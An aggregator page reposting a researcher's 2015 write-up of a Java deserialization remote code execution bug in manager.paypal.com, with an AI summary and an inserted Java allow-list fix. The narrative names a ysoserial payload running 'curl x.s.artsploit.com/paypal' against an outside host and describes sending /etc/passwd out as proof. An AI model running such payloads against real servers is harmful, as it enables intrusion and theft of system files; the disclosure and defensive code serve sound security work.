Paypal RCE

artsploit.blogspot.com · devanshbatham/Awesome-Bugbounty-Writeups · 4 hours ago · bug-bounty
AI Summary

A critical remote code execution vulnerability was discovered in PayPal's manager.paypal.com through unsafe Java object deserialization in the 'oldFormData' parameter, exploitable via the Commons Collections gadget chain and ysoserial tool to execute arbitrary OS commands and access production databases. The vulnerability was reported in December 2015 and patched by PayPal's security team.

Artsploit: [manager.paypal.com] Remote Code Execution Vulnerability
Monday, January 25, 2016

In December 2015, I found a critical vulnerability in one of PayPal's business websites (manager.paypal.com). It allowed me to execute arbitrary shell commands on PayPal web servers via unsafe Java object deserialization and to access production databases. I immediately reported this bug to the PayPal security team and it was fixed promptly.

Details

While testing the manager.paypal.com application, I noticed an unusual POST form parameter, "oldFormData", that looked like a complex object after base64 decoding.

Further investigation showed that it is a serialized Java object without any signature. This means you can send a serialized object of any class present on the server to the application, and that class's "readObject" (or "readResolve") method will be called during deserialization. For exploitation, you need to find a suitable class in the application's classpath that can be serialized and does something interesting (from an exploitation point of view) in its "readObject" method. You can read about this technique in the recent article by FoxGlove Security.

A year ago, Chris Frohoff (@frohoff) and Gabriel Lawrence (@gebl) did a great job and found suitable classes in the Commons Collections library that could lead to remote code execution. They also published the "ysoserial" payload generation tool on their GitHub page.

Exploit

I downloaded this tool and generated a simple payload that sends DNS and HTTP requests to my own server by executing the "curl x.s.artsploit.com/paypal" shell command.
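The root cause described above is that the server calls ObjectInputStream.readObject() on attacker-controlled bytes with no restriction on which classes may appear in the stream. The standard fix is a look-ahead deserialization allow-list: reject any class descriptor that is not one of the few types the endpoint legitimately expects, before that class's readObject() can run. The following is an added example written for this page, not code from the original post or from PayPal; the FormData class and its fields are hypothetical stand-ins for whatever oldFormData actually carried.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.Serializable;
import java.util.Base64;
import java.util.HashMap;
import java.util.Set;

// Hypothetical form-state class standing in for whatever the real endpoint
// stored in oldFormData; the field names are invented for this example.
final class FormData implements Serializable {
    private static final long serialVersionUID = 1L;
    final String accountId;
    final int page;

    FormData(String accountId, int page) {
        this.accountId = accountId;
        this.page = page;
    }
}

// Look-ahead ObjectInputStream: resolveClass() is invoked for each class
// descriptor as it is read, before any readObject()/readResolve() of that
// class executes, so an unexpected class is refused before it can do anything.
final class AllowListObjectInputStream extends ObjectInputStream {
    private final Set<String> allowed;

    AllowListObjectInputStream(InputStream in, Set<String> allowed) throws IOException {
        super(in);
        this.allowed = allowed;
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        if (!allowed.contains(desc.getName())) {
            throw new InvalidClassException(desc.getName(), "class not permitted in oldFormData");
        }
        return super.resolveClass(desc);
    }
}

public class OldFormDataDemo {
    // Only the one type this endpoint genuinely round-trips is permitted.
    static final Set<String> ALLOWED = Set.of(FormData.class.getName());

    // Helper that mirrors what the application does when it emits the parameter.
    static String serializeToBase64(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return Base64.getEncoder().encodeToString(bos.toByteArray());
    }

    // Server-side read of the parameter, hardened with the allow-list stream.
    static Object readOldFormData(String b64) throws IOException, ClassNotFoundException {
        byte[] raw = Base64.getDecoder().decode(b64);
        try (ObjectInputStream ois =
                     new AllowListObjectInputStream(new ByteArrayInputStream(raw), ALLOWED)) {
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // A legitimate value: the expected class is on the allow-list and round-trips.
        FormData fd = (FormData) readOldFormData(serializeToBase64(new FormData("acct-42", 3)));
        System.out.println("accepted: " + fd.accountId + " page " + fd.page);

        // Any other class, here a plain HashMap standing in for an unexpected
        // type, is rejected in resolveClass() before its readObject() is reached.
        try {
            readOldFormData(serializeToBase64(new HashMap<String, String>()));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Compile and run with `javac OldFormDataDemo.java && java OldFormDataDemo` (Java 9 or later, for Set.of). On Java 9+ the same policy can be expressed without subclassing through java.io.ObjectInputFilter (JEP 290), for example `ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter("FormData;!*"))`, which also lets you cap stream depth and array sizes. Either way, the defensive point matches the write-up: with no allow-list and no signature over the bytes, every Serializable class on the classpath is reachable from the parameter, and the application's security depends on none of them having a dangerous readObject().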
Then I sent the base64-encoded payload in the "oldFormData" parameter to the application server and was impressed by an incoming request from the PayPal network that appeared in my NGINX access log.

I realized that I could execute arbitrary OS commands on the web servers of manager.paypal.com, establish a back connection to my own Internet server and, for example, upload and execute a backdoor. As a result, I could get access to the production databases used by the manager.paypal.com application. Instead, I just read the "/etc/passwd" file and sent it to my server as proof of the vulnerability.

I also recorded a video showing how to reproduce this vulnerability and reported it to the PayPal security team. Later, I found out that many other endpoints of the manager.paypal.com application also use serialized objects and can be exploited in the same way.

A month later, my report received a Duplicate status because another researcher, Mark Litchfield, had reported a similar vulnerability two days before I did (on December 11, 2015). PayPal decided to pay me a good bounty anyway, and I have nothing but respect for them.

Demo

Posted by Michael Stepankin at 1:05:00 AM
Labels: #bugbounty, #paypal, #RCE